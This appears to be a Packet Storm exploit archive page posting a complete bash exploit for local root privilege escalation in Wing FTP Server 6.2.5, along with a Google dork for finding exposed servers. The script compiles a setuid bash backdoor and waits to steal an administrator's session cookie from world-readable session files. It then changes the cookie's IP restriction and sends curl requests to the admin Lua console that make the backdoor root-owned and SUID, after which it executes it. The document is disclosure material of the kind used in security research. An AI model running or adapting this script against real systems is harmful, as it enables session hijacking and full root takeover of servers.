exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Wing FTP Server 6.2.5 Privilege Escalation

Wing FTP Server 6.2.5 Privilege Escalation
Posted Mar 2, 2020
Authored by Cary Hooper

Wing FTP Server version 6.2.5 suffers from a privilege escalation vulnerability.

tags | exploit
SHA-256 | 7eb49147e2b7a042914d584480fc87c44246f255a8583d44fa1cc3318ec8da13

Wing FTP Server 6.2.5 Privilege Escalation

Change Mirror Download
# Exploit Title: Wing FTP Server 6.2.5 - Privilege Escalation
# Google Dork: intitle:"Wing FTP Server - Web"
# Date: 2020-03-03
# Exploit Author: Cary Hooper
# Vendor Homepage: https://www.wftpserver.com
# Software Link: https://www.wftpserver.com/download/wftpserver-linux-64bit.tar.gz
# Version: v6.2.5 and prior
# Tested on: Ubuntu 18.04
# CVE: N/A

# If $_WINGFTPDIR is the installation directory where Wing FTP was installed,
# $_WINGFTPDIR/wftpserver/session/* --> corresponds to user sessions... world readable/writeable (possibly exploitable)
# $_WINGFTPDIR/wftpserver/session_admin/* --> corresponds to admin sessions... world readable/writeable.
# We can wait for an admin to log in, steal their session, then launch a curl command which executes LUA.
# https://www.hooperlabs.xyz/disclosures/cve-2020-9470.php (writeup)



#!/bin/bash

echo 'Local root privilege escalation for Wing FTP Server (v.6.2.5)'
echo 'Exploit by Cary Hooper (@nopantrootdance)'

function writeBackdoor() {
#this function creates a backdoor program (executes bash)
echo " Writing backdoor in $1"
echo '#include <stdio.h>' > $1/foobarh00p.c
echo '#include <sys/types.h>' >> $1/foobarh00p.c
echo '#include <unistd.h>' >> $1/foobarh00p.c
echo 'int main(void){setuid(0); setgid(0); system("/bin/bash");}' >> $1/foobarh00p.c
gcc -w $1/foobarh00p.c -o $1/foobarh00p
}

function makeRequest() {
#Executes Lua command in admin panel to set the suid bit/chown on our backdoor
#Change owner to root
curl -i -k -b "UIDADMIN=$1" --data "command=io.popen('chown%20root%20$2%2Ffoobarh00p')" 'http://127.0.0.1:5466/admin_lua_script.html?r=0.08732964480139693' -H "Referer: http://127.0.0.1:5466/admin_lua_term.html" >/dev/null 2>/dev/null
#Make SUID
curl -i -k -b "UIDADMIN=$1" --data "command=io.popen('chmod%204777%20$2%2Ffoobarh00p')" 'http://127.0.0.1:5466/admin_lua_script.html?r=0.08732964480139693' -H "Referer: http://127.0.0.1:5466/admin_lua_term.html" >/dev/null 2>/dev/null
}

directories=( "/tmp" "/var/tmp" "/dev/shm" )
for dir in "${directories[@]}"
do
#Check if directories are writeable
if [ -w $dir ]
then
echo "[!] Writeable directory found: $dir"
export backdoordir=$dir
break
else
echo " $dir is not writeable..."; fi
done

writeBackdoor $backdoordir

#Look for directory where administrative sessions are handled ($_WINGFTPDIR/session_admin/).
echo " Finding the wftpserver directory"
export sessiondir=$(find / -name session_admin -type d 2>/dev/null | grep --color=never wftpserver)
if [ -z "$sessiondir" ]; then echo "Wing FTP directory not found. Consider looking manually."; exit 1; fi
#Note: if no directory is found, look manually for the "wftpserver" directory, or a "wftpserver" binary. Change the variable below and comment out the code above.
#export sessiondir="/opt/wftpserver/session_admin"

#While loop to wait for an admin session to be established.
echo " Waiting for a Wing FTP admin to log in. This may take a while..."
count=0
while : ; do
if [ "$(ls -A $sessiondir)" ]; then
#If a session file exists, the UID_ADMIN cookie is the name of the file.
echo "[!] An administrator logged in... stealing their session."
export cookie=$(ls -A $sessiondir | cut -d '.' -f1)
export ip=$(cat $sessiondir/$cookie.lua | grep ipaddress| cut -d '[' -f4 | cut -d ']' -f1)
echo " Changing IP restrictions on the cookie..."
cat $sessiondir/$cookie.lua | sed "s/$ip/127.0.0.1/g" > $backdoordir/$cookie.lua
cp $backdoordir/$cookie.lua $sessiondir/$cookie.lua
rm $backdoordir/$cookie.lua
echo "[!] Successfully stole session."
#Once found, make the malicious curl request
export urldir=$(sed "s/\//\%2F/g" <<<$backdoordir)
echo " Making evil request as Wing FTP admin... (backdoor in ${backdoordir})"
makeRequest $cookie $urldir
break
else
#Checks every 10 seconds. Outputs date to terminal for user feedback purposes only.
sleep 10
let "count+=1"
if [ $count -eq 10 ]; then date; fi
echo "..."
fi
done

#Check if backdoor was created correctly
if [ $(stat -c "%a" $backdoordir/foobarh00p) != "4777" ]; then echo " Something went wrong. Backdoor is not SUID"; exit 1; fi
if [ $(stat -c "%U" $backdoordir/foobarh00p) != "root" ]; then echo " Something went wrong. Backdoor is not owned by root"; exit 1; fi

echo " Backdoor is now SUID owned by root."
echo "[!] Executing backdoor. Cross your fingers..."
#Execute the backdoor... root!
$backdoordir/foobarh00p
Login or Register to add favorites

File Archive:

October 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    10 Files
  • 2
    Oct 2nd
    0 Files
  • 3
    Oct 3rd
    12 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    18 Files
  • 6
    Oct 6th
    16 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close